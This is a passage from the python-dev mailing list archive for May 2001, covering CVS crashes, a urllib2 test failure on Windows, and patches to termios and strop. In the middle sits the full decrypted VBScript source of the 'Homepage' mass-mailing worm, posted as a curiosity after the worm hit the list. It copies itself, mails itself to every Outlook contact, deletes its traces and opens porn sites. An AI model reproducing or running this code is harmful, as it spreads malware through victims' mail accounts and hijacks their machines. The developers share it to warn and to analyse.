use a cast expression as an lvalue <wink>.

sensible-or-not-it's-checked-in-so-please-try-again-ly y'rs  - tim


From jack at oratrix.nl  Wed May  9 10:16:29 2001
From: jack at oratrix.nl (Jack Jansen)
Date: Wed, 09 May 2001 10:16:29 +0200
Subject: [Python-Dev] Moving MacPython to sourceforge 
In-Reply-To: Message by <skip@pobox.com> ,
	     Tue, 8 May 2001 13:22:17 -0500 , <15096.14681.773554.729550@beluga.mojam.com> 
Message-ID: <20010509081630.84D8D303181@snelboot.oratrix.nl>

> 
>     Jack> It's actually 830 files. ... 120 .c/.h files ...
> 
> How many of those 120 files are variants of existing source files that (in
> theory) could be merged with their mainline counterparts?

None (unless you would count macmodule.c as a variant of posixmodule.c). I 
think macmain.c started out as a clone of pythonmain.c, but I think they're 
too different to merge (but I'll have a look).

Hmm, now that I think of it macmodule and posixmodule could possibly be 
merged.

It's fun to see how much statistics I gather about MacPython in just a few 
days:-)
--
Jack Jansen             | ++++ stop the execution of Mumia Abu-Jamal ++++
Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++
www.oratrix.nl/~jack    | see http://www.xs4all.nl/~tank/spg-l/sigaction.htm 


From tim.one at home.com  Wed May  9 10:20:12 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 9 May 2001 04:20:12 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Python compile.c,2.198,2.199
In-Reply-To: <20010508070501.A25794@glacier.fnational.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCKEAGKBAA.tim.one@home.com>

[Neil Schemenauer]
> Shouldn't the entry in the __future__ file be:
>
>   nested_scopes = _Feature((2, 1, 0, "beta", 1), (2, 2, 0, "alpha", 0))
>
> or am I misunderstanding something?

Until nested_scopes *is* the rule, the Mandatory Release field is just a
guess about the future.  Changing it to (2, 2, 0, "alpha", 0) right *now*
would be wrong, since it would change it from a guess about the future to a
false statement about the present.  It must be changed when nested_scopes
become mandatory; it needn't be changed before then (unless we delay making
them mandatory beyond 2.2 final), although if somebody thinks they have a
good use for moving the guess up, fine, just so long as they don't move the
guess to or before 2.2a0.


From thomas at xs4all.net  Wed May  9 10:58:50 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Wed, 9 May 2001 10:58:50 +0200
Subject: [Python-Dev] Crashes w/ CVS tree
Message-ID: <20010509105850.F16486@xs4all.nl>

I'm getting a crash with Python compiled from a freshly updated CVS tree,
even when running just './python'. It crashes during the loading of os.pyc.
It doesn't crash if I start python with -S, and it doesn't crash if I remove
*.pyc first:

centurion:~/python/python-2.2/dist/src/linux> ./python 
Python 2.2a0 (#4, May  9 2001, 09:52:29) 
[GCC 2.95.4 20010506 (Debian prerelease)] on linux2
Type "copyright", "credits" or "license" for more information.
>>> 
centurion:~/python/python-2.2/dist/src/linux> ./python
Segmentation fault

If I remove os.pyc only, I get the enlightning:

Fatal Python error: PyString_InternInPlace: strings only please!
Abort (core dumped)

I would blame Tim <wink>, except that when examining the corefile I found
some pointers to other causes. The 'original' crash occurs because
cmp_outcome() is passed an invalid PyObject, with most of its function slots
pointing to the middle of the glibc-internal '__morecore()' function.
Examining the stack off of which the invalid item was popped reveals that
the next-to-last item is an iterator. So maybe I should blame Guido instead,
either for the iterator or for rich comparisons ;)


From thomas at xs4all.net  Wed May  9 11:14:32 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Wed, 9 May 2001 11:14:32 +0200
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Objects stringobject.c,2.111,2.112
In-Reply-To: <E14xPZ5-0002g4-00@usw-pr-cvs1.sourceforge.net>; from tim_one@users.sourceforge.net on Wed, May 09, 2001 at 01:43:23AM -0700
References: <20010509105850.F16486@xs4all.nl> <E14xPZ5-0002g4-00@usw-pr-cvs1.sourceforge.net>
Message-ID: <20010509111432.G16486@xs4all.nl>

On Wed, May 09, 2001 at 01:43:23AM -0700, Tim Peters wrote:
> Update of /cvsroot/python/python/dist/src/Objects
> In directory usw-pr-cvs1:/tmp/cvs-serv10106/python/dist/src/Objects
> 
> Modified Files:
> 	stringobject.c 
> Log Message:
> Sheesh -- repair the dodge around "cast isn't an lvalue" complaints to
> restore correct semantics.

This apparently fixed my problem:

On Wed, May 09, 2001 at 10:58:50AM +0200, Thomas Wouters wrote:
> 
> I'm getting a crash with Python compiled from a freshly updated CVS tree,
> even when running just './python'. It crashes during the loading of os.pyc.
> It doesn't crash if I start python with -S, and it doesn't crash if I remove
> *.pyc first:

That ought to teach me to spend my morning doing something fun -- it turned
out to be useless :-)

-- 
Thomas Wouters <thomas at xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From tim.one at home.com  Wed May  9 11:29:31 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 9 May 2001 05:29:31 -0400
Subject: [Python-Dev] Crashes w/ CVS tree
In-Reply-To: <20010509105850.F16486@xs4all.nl>
Message-ID: <LNBBLJKPBEHFEDALKOLCMEALKBAA.tim.one@home.com>

[Thomas Wouters]
> I'm getting a crash with Python compiled from a freshly updated CVS
> tree,even when running just './python'.

I did too, for a little while, but it's gone away.

> ...
> Fatal Python error: PyString_InternInPlace: strings only please!
> Abort (core dumped)
>
> I would blame Tim <wink>,

I would too.  Please update, and if stringobject.c changes, try again.

I'm sure this is my fault, but I'm too sleepy to figure out why, and I did
change *something* at random that appeared to make it go away <wink>.

it's-all-gcc's-fault-ly y'rs  - tim


From Greg.Wilson at baltimore.com  Wed May  9 17:49:29 2001
From: Greg.Wilson at baltimore.com (Greg Wilson)
Date: Wed, 9 May 2001 11:49:29 -0400 
Subject: [Python-Dev] Homepage
Message-ID: <930BBCA4CEBBD411BE6500508BB3328F27B523@nsamcanms1.ca.baltimore.com>


Hi!

You've got to see this page! It's really cool ;O)


-------------- next part --------------
A non-text attachment was scrubbed...
Name: homepage.HTML.vbs
Type: application/octet-stream
Size: 2419 bytes
Desc: not available
URL: <http://mail.python.org/pipermail/python-dev/attachments/20010509/144ed4b6/attachment-0001.obj>

From guido at digicool.com  Wed May  9 19:08:22 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 09 May 2001 12:08:22 -0500
Subject: [Python-Dev] Homepage
In-Reply-To: Your message of "Wed, 09 May 2001 11:49:29 -0400."
             <930BBCA4CEBBD411BE6500508BB3328F27B523@nsamcanms1.ca.baltimore.com> 
References: <930BBCA4CEBBD411BE6500508BB3328F27B523@nsamcanms1.ca.baltimore.com> 
Message-ID: <200105091708.MAA30552@cj20424-a.reston1.va.home.com>

Greg Wilson's computer was infected by a virus which got propagated to
python-dev.  Do NOT open the attachment!

--Guido van Rossum (home page: http://www.python.org/~guido/)


From fredrik at pythonware.com  Wed May  9 18:12:00 2001
From: fredrik at pythonware.com (Fredrik Lundh)
Date: Wed, 9 May 2001 18:12:00 +0200
Subject: [Python-Dev] Homepage
References: <930BBCA4CEBBD411BE6500508BB3328F27B523@nsamcanms1.ca.baltimore.com>
Message-ID: <00fa01c0d8a2$c8d72b60$e46940d5@hagrid>

Greg's mail program wrote:

> Hi!
>
> You've got to see this page! It's really cool ;O)

> Content-Type: application/octet-stream;
>  name="homepage.HTML.vbs"
> Content-Transfer-Encoding: quoted-printable
> Content-Disposition: attachment;
>  filename="homepage.HTML.vbs"

when will we see the first "homepage.HTML.py" virus?

Cheers /F


From esr at thyrsus.com  Wed May  9 18:20:24 2001
From: esr at thyrsus.com (Eric S. Raymond)
Date: Wed, 9 May 2001 12:20:24 -0400
Subject: [Python-Dev] Homepage
In-Reply-To: <200105091708.MAA30552@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Wed, May 09, 2001 at 12:08:22PM -0500
References: <930BBCA4CEBBD411BE6500508BB3328F27B523@nsamcanms1.ca.baltimore.com> <200105091708.MAA30552@cj20424-a.reston1.va.home.com>
Message-ID: <20010509122024.A416@thyrsus.com>

Guido van Rossum <guido at digicool.com>:
> Greg Wilson's computer was infected by a virus which got propagated to
> python-dev.  Do NOT open the attachment!

Some of us -- heh, heh -- aren't vulnerable to attachment trojans.
I could almost (not quite, but almost) love the crackers and script
kiddiez of the world for what they're doing to Microsoft...
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

We shall not cease from exploration, and the end of all our exploring will be
to arrive where we started and know the place for the first time.
	-- T.S. Eliot


From fdrake at cj42289-a.reston1.va.home.com  Wed May  9 18:21:27 2001
From: fdrake at cj42289-a.reston1.va.home.com (Fred Drake)
Date: Wed,  9 May 2001 12:21:27 -0400 (EDT)
Subject: [Python-Dev] [maintenance doc updates]
Message-ID: <20010509162127.52B6228946@cj42289-a.reston1.va.home.com>

The development version of the documentation has been updated:

	http://python.sourceforge.net/maint-docs/

Incremental update of the maintenance branch (for Python 2.1.1).


From barry at digicool.com  Wed May  9 18:23:26 2001
From: barry at digicool.com (Barry A. Warsaw)
Date: Wed, 9 May 2001 12:23:26 -0400
Subject: [Python-Dev] Homepage
References: <930BBCA4CEBBD411BE6500508BB3328F27B523@nsamcanms1.ca.baltimore.com>
	<200105091708.MAA30552@cj20424-a.reston1.va.home.com>
Message-ID: <15097.28414.354061.170478@anthem.wooz.org>

>>>>> "GvR" == Guido van Rossum <guido at digicool.com> writes:

    GvR> Greg Wilson's computer was infected by a virus which got
    GvR> propagated to python-dev.  Do NOT open the attachment!

Darn, and I was just finishing up the vbs.el script so my XEmacs/VM
reader could open it.

share-the-pain-share-the-fun-ly y'rs,
-Barry


From fdrake at cj42289-a.reston1.va.home.com  Wed May  9 18:47:27 2001
From: fdrake at cj42289-a.reston1.va.home.com (Fred Drake)
Date: Wed,  9 May 2001 12:47:27 -0400 (EDT)
Subject: [Python-Dev] [development doc updates]
Message-ID: <20010509164727.1594428946@cj42289-a.reston1.va.home.com>

The development version of the documentation has been updated:

	http://python.sourceforge.net/devel-docs/

Incremental update of the development branch (for Python 2.2).


From pedroni at inf.ethz.ch  Wed May  9 19:12:20 2001
From: pedroni at inf.ethz.ch (Samuele Pedroni)
Date: Wed, 9 May 2001 19:12:20 +0200 (MET DST)
Subject: [Python-Dev] Homepage
Message-ID: <200105091712.TAA05172@core.inf.ethz.ch>

Hi.

[GvR]
> Greg Wilson's computer was infected by a virus which got propagated to
> python-dev.  Do NOT open the attachment!

Here's the beast ("decrypted" and in a cage):
 ("decrypted" and in a cage):
(we got it also on the old jpython-interest)

MS has really increased computer usability, when I was younger
(and I'm not that old) one bad guy had to use assembler to cause
some damage, now thanks to MS, that don't cares much about security
but likely a lot about self-confindence, everybody can feel very clever
and proud writing such things ... and spamming the whole internet.

<danger>
On Error Resume Next
Set WS = CreateObject("WScript.Shell")
Set FSO= Createobject("scripting.filesystemobject")
Folder=FSO.GetSpecialFolder(2)

Set InF=FSO.OpenTextFile(WScript.ScriptFullname,1)
Do While InF.AtEndOfStream<>True
ScriptBuffer=ScriptBuffer&InF.ReadLine&vbcrlf
Loop

Set OutF=FSO.OpenTextFile(Folder&"\homepage.HTML.vb$",2,true)
OutF.write ScriptBuffer
OutF.close
Set FSO=Nothing

If WS.regread ("HKCU\software\An\mailed") <> "1" then
Mailit()
End If

Set s=CreateObject("Outlook.Application")
Set t=s.GetNameSpace("MAPI")
Set u=t.GetDefaultFolder(6)
For i=1 to u.items.count
If u.Items.Item(i).subject="Homepage" Then
u.Items.Item(i).close
u.Items.Item(i).delete
End If
Next
Set u=t.GetDefaultFolder(3)
For i=1 to u.items.count
If u.Items.Item(i).subject="Homepage" Then
u.Items.Item(i).delete
End If
Next

Randomize
r=Int((4*Rnd)+1)
If r=1 then
WS.Run("http://hardcore.pornbillboard.net/shannon/1.htm")
elseif r=2 Then
WS.Run("http://members.nbci.com/_XMCM/prinzje/1.htm")
elseif r=3 Then
WS.Run("http://www2.sexcropolis.com/amateur/sheila/1.htm")
ElseIf r=4 Then
WS.Run("http://sheila.issexy.tv/1.htm")
End If

Function Mailit()
On Error Resume Next
Set Outlook = CreateObject("Outlook.Application")
If Outlook = "Outlook" Then
	Set Mapi=Outlook.GetNameSpace("MAPI")
	Set Lists=Mapi.AddressLists
	For Each ListIndex In Lists
		If ListIndex.AddressEntries.Count <> 0 Then
			ContactCount = ListIndex.AddressEntries.Count
			For Count= 1 To ContactCount
				Set Mail = Outlook.CreateItem(0)
				Set Contact = ListIndex.AddressEntries(Count)
				Mail.To = Contact.Address
				Mail.Subject = "Homepage"
				Mail.Body = vbcrlf&"Hi!"&vbcrlf&vbcrlf&"You've 
got to see this page! It's really cool ;O)"&vbcrlf&vbcrlf
				Set Attachment=Mail.Attachments
				Attachment.Add Folder & "\homepage.HTML.vb$"
				Mail.DeleteAfterSubmit = True
				If Mail.To <> "" Then
				Mail.Send
				WS.regwrite "HKCU\software\An\mailed", "1"
			End If
			Next
		End If
	Next
End if
End Function
</danger>

PS: the "decryption" was done in python ;)


From tim.one at home.com  Wed May  9 19:47:22 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 9 May 2001 13:47:22 -0400
Subject: [Python-Dev] Homepage
In-Reply-To: <200105091708.MAA30552@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCKECFKBAA.tim.one@home.com>

[Guido]
> Greg Wilson's computer was infected by a virus which got propagated to
> python-dev.  Do NOT open the attachment!

Note that the same virus went out under the name of John G. Michopoulos on
the JPython (not Jython!) mailing list.

Here's detailed info on the virus (incl. simple removal instructions if you
got bit):

http://www.symantec.com/avcenter/venc/data/vbs.vbswg2.d at mm.html

Doesn't appear to be worse than a nuisance.  Anyone who has used Windows
Update within the last year <wink/sigh> and installed the "critical updates"
it recommends should have gotten a popup box warning that the attachment was
trying to access the Address Book, telling you it's probably a virus, and
advising to accept the "No, don't allow this" default.

you-can-make-it-foolproof-but-not-damnedfool-proof-ly y'rs  - tim


From Greg.Wilson at baltimore.com  Wed May  9 20:50:25 2001
From: Greg.Wilson at baltimore.com (Greg Wilson)
Date: Wed, 9 May 2001 14:50:25 -0400 
Subject: [Python-Dev] apology
Message-ID: <930BBCA4CEBBD411BE6500508BB3328F27B690@nsamcanms1.ca.baltimore.com>

My apologies to all --- yes, my machine was hit by a virus
that flooded the known universe with email.

Sorry for any grief it has caused anyone,
Greg


From tim.one at home.com  Wed May  9 21:30:41 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 9 May 2001 15:30:41 -0400
Subject: [Python-Dev] test_urllib2 fails on Win98SE
Message-ID: <LNBBLJKPBEHFEDALKOLCAECIKBAA.tim.one@home.com>

test_urliib2 takes > 30 seconds, then fails:

C:\Code\python\dist\src\PCbuild>python ../lib/test/test_urllib2.py
Traceback (most recent call last):
  File "../lib/test/test_urllib2.py", line 15, in ?
    f = urllib2.urlopen(file_url)
  File "c:\code\python\dist\src\lib\urllib2.py", line 135, in urlopen
    return _opener.open(url, data)
  File "c:\code\python\dist\src\lib\urllib2.py", line 319, in open
    '_open', req)
  File "c:\code\python\dist\src\lib\urllib2.py", line 298, in _call_chain
    result = func(*args)
  File "c:\code\python\dist\src\lib\urllib2.py", line 904, in file_open
    return self.open_local_file(req)
  File "c:\code\python\dist\src\lib\urllib2.py", line 923, in open_local_file
    if not host or \
socket.error: host not found

The URL it's passing is

file://c:\code\python\dist\src\lib\urllib2.pyc

If I change test_urllib2's

    file_url = "file://%s" % urllib2.__file__

to (adding another slash)

    file_url = "file:///%s" % urllib2.__file__

then it fails like this instead, but very quickly:

C:\Code\python\dist\src\PCbuild>python ../lib/test/test_urllib2.py
Traceback (most recent call last):
  File "../lib/test/test_urllib2.py", line 15, in ?
    f = urllib2.urlopen(file_url)
  File "c:\code\python\dist\src\lib\urllib2.py", line 135, in urlopen
    return _opener.open(url, data)
  File "c:\code\python\dist\src\lib\urllib2.py", line 319, in open
    '_open', req)
  File "c:\code\python\dist\src\lib\urllib2.py", line 298, in _call_chain
    result = func(*args)
  File "c:\code\python\dist\src\lib\urllib2.py", line 904, in file_open
    return self.open_local_file(req)
  File "c:\code\python\dist\src\lib\urllib2.py", line 925, in open_local_file
    return addinfourl(open(url2pathname(file), 'rb'),
IOError: [Errno 2] No such file or directory:
     '\\c:\\code\\python\\dist\\src\\lib\\urllib2.pyc'

Here's what I know about URLs: .

Here's what I know about file URLs: .

Here's what I know about file URLs on Windows: .

If I type the original

    file://c:\code\python\dist\src\lib\urllib2.pyc

into IE's address bar, it actually *executes* urllib2.


From mwh at python.net  Wed May  9 21:50:34 2001
From: mwh at python.net (Michael Hudson)
Date: 09 May 2001 20:50:34 +0100
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Modules termios.c,2.24,2.25
In-Reply-To: "Fred L. Drake"'s message of "Mon, 07 May 2001 10:55:37 -0700"
References: <E14wpEP-0000fi-00@usw-pr-cvs1.sourceforge.net>
Message-ID: <m3bsp2s3n9.fsf@atrus.jesus.cam.ac.uk>

"Fred L. Drake" <fdrake at users.sourceforge.net> writes:

> ! 	fd = PyObject_AsFileDescriptor(obj);
> ! 	if (fd == -1) {
> ! 		if (PyInt_Check(obj)) {
                    ^^^^^^^^^^^^^^^^
this is a bit pointless.

I admit

->> termios.tcgetattr(-2)
Traceback (most recent call last):
  File "<input>", line 1, in ?
TypeError: tcgetattr, arg 1: can't extract file descriptor from "int"

is a bit confusing, but I'm not sure 

->> termios.tcgetattr(-2)
Traceback (most recent call last):
  File "<input>", line 1, in ?
error: (9, 'Bad file descriptor')

is any better than:

->> termios.tcgetattr(-2)
Traceback (most recent call last):
  File "<input>", line 1, in ?
ValueError: file descriptor cannot be a negative integer (-2)

which is what you get after applying this patch:

Index: Modules/termios.c
===================================================================
RCS file: /cvsroot/python/python/dist/src/Modules/termios.c,v
retrieving revision 2.26
diff -c -r2.26 termios.c
*** Modules/termios.c   2001/05/09 17:53:06     2.26
--- Modules/termios.c   2001/05/09 19:49:52
***************
*** 37,43 ****
        fd = PyObject_AsFileDescriptor(obj);
        if (fd == -1) {
                if (PyInt_Check(obj)) {
!                       fd = PyInt_AS_LONG(obj);
                }
                else {
                        char* tname;
--- 37,43 ----
        fd = PyObject_AsFileDescriptor(obj);
        if (fd == -1) {
                if (PyInt_Check(obj)) {
!                       return 0;
                }
                else {
                        char* tname;

Cheers,
M.


From fdrake at acm.org  Wed May  9 22:09:09 2001
From: fdrake at acm.org (Fred L. Drake, Jr.)
Date: Wed, 9 May 2001 16:09:09 -0400 (EDT)
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Modules termios.c,2.24,2.25
In-Reply-To: <m3bsp2s3n9.fsf@atrus.jesus.cam.ac.uk>
References: <E14wpEP-0000fi-00@usw-pr-cvs1.sourceforge.net>
	<m3bsp2s3n9.fsf@atrus.jesus.cam.ac.uk>
Message-ID: <15097.41957.820142.77750@cj42289-a.reston1.va.home.com>

Michael Hudson writes:
 > this is a bit pointless.

  You're right!  (Hey, it was your patch. ;)
  I'm checking in a different patch -- essentially,
PyObject_AsFileDescriptor() does the right thing, and we don't ever
need to second guess it.


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From mwh at python.net  Wed May  9 22:13:46 2001
From: mwh at python.net (Michael Hudson)
Date: 09 May 2001 21:13:46 +0100
Subject: [Python-Dev] "data".decode(encoding) ?!
In-Reply-To: "M.-A. Lemburg"'s message of "Wed, 02 May 2001 21:55:25 +0200"
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com>
Message-ID: <m38zk6s2kl.fsf@atrus.jesus.cam.ac.uk>

"M.-A. Lemburg" <mal at lemburg.com> writes:

> I've attached the patch. Due to a small reorganisation the patch is
> a little longer -- symmetry has its price at C level too ;-)

I may be being dense, but can you explain what's going on here:

->> u'\u00e3'.encode('latin-1')
'\xe3'
->> u'\u00e3'.encode("latin-1").decode("latin-1")
Traceback (most recent call last):
  File "<input>", line 1, in ?
UnicodeError: ASCII encoding error: ordinal not in range(128)

Can you come up with some other example I can use it tomorrow's
python-dev summary?

Cheers,
M.

-- 
  Remember - if all you have is an axe, every problem looks 
  like hours of fun.                                        -- Frossie
               -- http://home.xnet.com/~raven/Sysadmin/ASR.Quotes.html


From mwh at python.net  Wed May  9 22:18:47 2001
From: mwh at python.net (Michael Hudson)
Date: 09 May 2001 21:18:47 +0100
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Modules termios.c,2.24,2.25
References: <E14wpEP-0000fi-00@usw-pr-cvs1.sourceforge.net> <m3bsp2s3n9.fsf@atrus.jesus.cam.ac.uk> <15097.41957.820142.77750@cj42289-a.reston1.va.home.com>
Message-ID: <m33daes2c8.fsf@atrus.jesus.cam.ac.uk>

"Fred L. Drake, Jr." <fdrake at acm.org> writes:

> Michael Hudson writes:
>  > this is a bit pointless.
> 
>   You're right!  (Hey, it was your patch. ;)

So it was!  I must have uploaded a slightly stale version of the
patch, because I noticed this when cvs update conflicted with what I
had in Modules/termios.c... oops.

>   I'm checking in a different patch -- essentially,
> PyObject_AsFileDescriptor() does the right thing, and we don't ever
> need to second guess it.

I was a bit concerned that the error should contain the function name.
On reflection, I agree that the code is so much simpler that it's a
win.

Cheers,
M.

-- 
  Java sucks. [...] Java on TV set top boxes will suck so hard it
  might well inhale people from off  their sofa until their heads
  get wedged in the card slots.              --- Jon Rabone, ucam.chat


From paulp at ActiveState.com  Wed May  9 22:48:38 2001
From: paulp at ActiveState.com (Paul Prescod)
Date: Wed, 09 May 2001 13:48:38 -0700
Subject: [Python-Dev] test_urllib2 fails on Win98SE
References: <LNBBLJKPBEHFEDALKOLCAECIKBAA.tim.one@home.com>
Message-ID: <3AF9AD26.AC6DD323@ActiveState.com>

Tim Peters wrote:
> 
>...
> 
> Here's what I know about file URLs on Windows: .

We constantly run into these problems with Komodo. The long and short is
that file URL handling on Windows is totally different than on Unix and
platform-specific code is probably appropriate.

Here's what I know: IE treats the following equivalently:

c:\temp\diff.txt
file:c:\temp\diff.txt
file:/c:\temp\diff.txt
file://c:\temp\diff.txt
file:///c:\temp\diff.txt
file:///////////////////////////////c:\temp\diff.txt

You can also reverse backslashes to slashes and slashes to backslashes
if you like. Interestingly, though, UNC paths seem to work okay (no
matter how you do the slashes and backslashes):

file://americano\home\paulp\foo.html

UNC paths seem to only allow two leading slashes/backslashes.

Truly this is a new level of "be liberal in what you accept". The
algorithm is probably something like:

 1. normalize to forward slashes. 
 2. Remove "file:". 
 3. What you have left should be of the form:

//machine/path

or 

(/*)x:/path

Where x is the drive letter.

-- 
Take a recipe. Leave a recipe.  
Python Cookbook!  http://www.ActiveState.com/pythoncookbook


From fredrik at effbot.org  Thu May 10 01:19:40 2001
From: fredrik at effbot.org (Fredrik Lundh)
Date: Thu, 10 May 2001 01:19:40 +0200
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
References: <E14xcwW-0004E4-00@usw-pr-cvs1.sourceforge.net>
Message-ID: <05e001c0d8de$87fcb9c0$e46940d5@hagrid>

tim wrote:

> Modified Files:
> stropmodule.c 
> Log Message:
> SF bug #422088: [OSF1 alpha] string.replace().
> Platform blew up on "123".replace("123", "").  Michael Hudson pinned the
> blame on platform malloc(0) returning NULL.

any reason why the

#ifdef MALLOC_ZERO_RETURNS_NULL

macro (in pyport.h) isn't set / doesn't take care of this?

(and is it just me, or does the strop.replace function allocate
a buffer, copy the result to that buffer, only to copy it into a
string and throw the buffer away?  no wonder u"".replace() is
30% faster than "".replace() ;-)

Cheers /F


From tim at digicool.com  Thu May 10 01:39:08 2001
From: tim at digicool.com (Tim Peters)
Date: Wed, 9 May 2001 19:39:08 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
In-Reply-To: <05e001c0d8de$87fcb9c0$e46940d5@hagrid>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEDHKBAA.tim@digicool.com>

[Fredrik Lundh]
> any reason why the
>
> #ifdef MALLOC_ZERO_RETURNS_NULL
>
> macro (in pyport.h) isn't set / doesn't take care of this?

The code uses PyMem_MALLOC, which after a chain of umpteen #defines ends up
being plain malloc.  As Michael noted in the bug report, it could have used
PyMem_Malloc() instead and avoided the problem.  But I chose not to do that,
since special-casing a result of 0 was more efficient for reasons other than
malloc.  However:

> (and is it just me, or does the strop.replace function allocate
> a buffer, copy the result to that buffer, only to copy it into a
> string and throw the buffer away?

Yes.  And I'm returning something now that musn't be free()'ed when the
result length is 0.  Will fix.

> no wonder u"".replace() is 30% faster than "".replace() ;-)

For a given number of characters or bytes <wink>?


From tim.one at home.com  Thu May 10 01:46:13 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 9 May 2001 19:46:13 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
In-Reply-To: <LNBBLJKPBEHFEDALKOLCGEDHKBAA.tim@digicool.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCCEDIKBAA.tim.one@home.com>

Oh, fuck.  Somebody remind me why we have both stropmodule.c and
stringobject.c?  These bugs exist in both.


From mike.mellor at tbe.com  Thu May 10 02:16:28 2001
From: mike.mellor at tbe.com (mike.mellor at tbe.com)
Date: Thu, 10 May 2001 00:16:28 -0000
Subject: [Python-Dev] CygWin and Tkinter
Message-ID: <9dcmks+6aqf@eGroups.com>

I am playing around with CygWin (which came with Pyhton 2.1 
installed).  While I can run command line programs, Tkinter is not 
part of the package.  TCL/TK is installed and I have been able to 
build TK GUI's.  How can I get Tkinter added to my Python package?  
Thanks.

Mike


From tim.one at home.com  Thu May 10 02:47:52 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 9 May 2001 20:47:52 -0400
Subject: [Python-Dev] Inconsistent string.replace() behavior
Message-ID: <LNBBLJKPBEHFEDALKOLCGEDLKBAA.tim.one@home.com>

test_strop.py contains this line:

    test('replace', 'one!two!three!', 'one at two@three@', '!', '@', 0)

string_tests.py has this:

    test('replace', 'one!two!three!', 'one!two!three!', '!', '@', 0)

IOW, the test suite insists that

    strop.replace('one!two!three!', '!', '@', 0)

replace all matches but that

    string.replace('one!two!three!', '!', '@', 0)
and
    'one!two!three!'.replace('!', '@', 0)

replace nothing.

I've been thrashing like a madman trying to fix a common bug in both modules
(in out-of-synch copies of mymemreplace), and every time I think I fix
something "the other" module breaks.  The above appears to be why.

My opinion:  the test_strop.py test is in error, and so was strop_replace()
in stropmodule.c.  I'm checking in changes accordingly, but won't mind
getting yelled at if you disagree.


From greg at cosc.canterbury.ac.nz  Thu May 10 02:56:12 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Thu, 10 May 2001 12:56:12 +1200 (NZST)
Subject: [Python-Dev] gcc barfs on recent stringobject changes...
In-Reply-To: <LNBBLJKPBEHFEDALKOLCEEADKBAA.tim.one@home.com>
Message-ID: <200105100056.MAA17516@s454.cosc.canterbury.ac.nz>

Tim Peters <tim.one at home.com>:

>		PyObject *t = (PyObject *)op;
>    		PyString_InternInPlace(&t);

If you want to keep it all on one line, you could try

	PyString_InternInPlace((PyObject **)&op);

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz	   +--------------------------------------+


From guido at digicool.com  Thu May 10 04:00:36 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 09 May 2001 21:00:36 -0500
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
In-Reply-To: Your message of "Wed, 09 May 2001 19:46:13 -0400."
             <LNBBLJKPBEHFEDALKOLCCEDIKBAA.tim.one@home.com> 
References: <LNBBLJKPBEHFEDALKOLCCEDIKBAA.tim.one@home.com> 
Message-ID: <200105100200.VAA00411@cj20424-a.reston1.va.home.com>

> Oh, fuck.  Somebody remind me why we have both stropmodule.c and
> stringobject.c?  These bugs exist in both.

In my mind, strop is obsolete.  We keep it around because some losers
like to import it directly, but it's basically dead, and except for a
few functions, string.py doesn't use it any more.  (The exceptions are
maketrans, lowercase, uppercase, whitespace.)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido at digicool.com  Thu May 10 04:01:20 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 09 May 2001 21:01:20 -0500
Subject: [Python-Dev] CygWin and Tkinter
In-Reply-To: Your message of "Thu, 10 May 2001 00:16:28 GMT."
             <9dcmks+6aqf@eGroups.com> 
References: <9dcmks+6aqf@eGroups.com> 
Message-ID: <200105100201.VAA00435@cj20424-a.reston1.va.home.com>

> I am playing around with CygWin (which came with Pyhton 2.1 
> installed).  While I can run command line programs, Tkinter is not 
> part of the package.  TCL/TK is installed and I have been able to 
> build TK GUI's.  How can I get Tkinter added to my Python package?  
> Thanks.

Beats me.  Ask whoever produces the CygWin port.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one at home.com  Thu May 10 03:07:40 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 9 May 2001 21:07:40 -0400
Subject: [Python-Dev] gcc barfs on recent stringobject changes...
In-Reply-To: <200105100056.MAA17516@s454.cosc.canterbury.ac.nz>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEDNKBAA.tim.one@home.com>

>>		PyObject *t = (PyObject *)op;
>>   		PyString_InternInPlace(&t);

[Greg Ewing]
> If you want to keep it all on one line, you could try
>
> 	PyString_InternInPlace((PyObject **)&op);

op is declared "register" so it's not strictly legal to apply the address-of
operator to it regardless.  Besides, Guido pays me by the line <wink>.

